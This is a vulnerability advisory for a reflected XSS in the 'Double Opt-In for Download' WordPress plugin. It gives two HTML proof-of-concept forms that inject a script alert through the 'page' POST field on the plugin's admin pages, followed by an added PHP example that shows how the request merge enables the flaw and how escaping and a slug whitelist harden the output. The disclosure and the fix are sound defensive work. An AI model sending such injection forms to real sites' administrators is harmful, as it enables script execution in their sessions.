Double Opt-In for Download [Reflected XSS]

Description

The Double Opt-In for Download plugin suffers from a Reflected XSS vulnerability because it doesn’t properly escape request variables before printing them to the screen.

The vulnerable parameter is $_REQUEST['page']. Usually this variable takes its value from $_GET['page'], but because WordPress populates $_REQUEST first from $_GET and then from $_POST, a malicious POST request can reach the vulnerable page and inject JS code into the vulnerable parameter at the same time.

The vulnerable parameter is used in both the Downloads and Subscribers pages of the plugin options (the slugs are doifd-admin-menu_downloads and doifd-admin-menu_subscribers respectively).

PoC

A user with administrative rights has to submit these forms for the exploit to succeed.

<form action="http://sbwp2.dev/wp-admin/admin.php?page=doifd-admin-menu_downloads" method="post">
    <input type="hidden" name="page" value='"><script>alert(/XSS/)</script>'>
    <input type="submit" value="Downloads">
</form>
<form action="http://sbwp2.dev/wp-admin/admin.php?page=doifd-admin-menu_subscribers" method="post">
    <input type="hidden" name="page" value='"><script>alert(/XSS/)</script>'>
    <input type="submit" value="Subscribers">
</form>
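
Why the POST field wins over the query string, and how the output can be hardened, as an added example that is not the plugin's code or part of the original advisory. The two render functions are hypothetical stand-ins (the advisory does not show the plugin source), the request arrays are constructed, and htmlspecialchars() stands in for WordPress's esc_attr() so the script runs without WordPress.

```php
<?php
// Constructed request mirroring the PoC: the slug travels in the query
// string, the markup in a POST field with the same name.
$get  = ['page' => 'doifd-admin-menu_downloads'];
$post = ['page' => '"><script>alert(/XSS/)</script>'];

// WordPress rebuilds $_REQUEST as array_merge($_GET, $_POST), so for a key
// present in both, the POST value replaces the GET value.
$request = array_merge($get, $post);

// Hypothetical stand-in for the plugin's output. The advisory only states
// that the value is printed without escaping; the attribute context is an
// assumption based on the '">' prefix of the PoC value.
function render_vulnerable(array $request): string {
    return '<input type="hidden" name="page" value="' . $request['page'] . '">';
}

// Hardened form: read the slug from the query string only, accept nothing
// but the two slugs named in the advisory, and escape on output.
const DOIFD_PAGES = ['doifd-admin-menu_downloads', 'doifd-admin-menu_subscribers'];

function render_hardened(array $get): string {
    $page = isset($get['page']) && is_string($get['page']) ? $get['page'] : '';
    if (!in_array($page, DOIFD_PAGES, true)) {
        $page = DOIFD_PAGES[0]; // fall back to a known-good slug
    }
    // In WordPress this would be esc_attr($page).
    return '<input type="hidden" name="page" value="'
        . htmlspecialchars($page, ENT_QUOTES, 'UTF-8') . '">';
}

echo "merged value: ", $request['page'], "\n";
echo "vulnerable:   ", render_vulnerable($request), "\n";
echo "hardened:     ", render_hardened($get), "\n";
// Escaping alone already keeps the merged value inside the attribute:
echo "escaped only: ", htmlspecialchars($request['page'], ENT_QUOTES, 'UTF-8'), "\n";
```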
